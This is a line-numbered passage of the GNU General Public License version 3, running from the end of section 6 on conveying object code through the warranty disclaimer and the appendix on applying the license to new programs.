accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | --------------------------------------------------------------------------------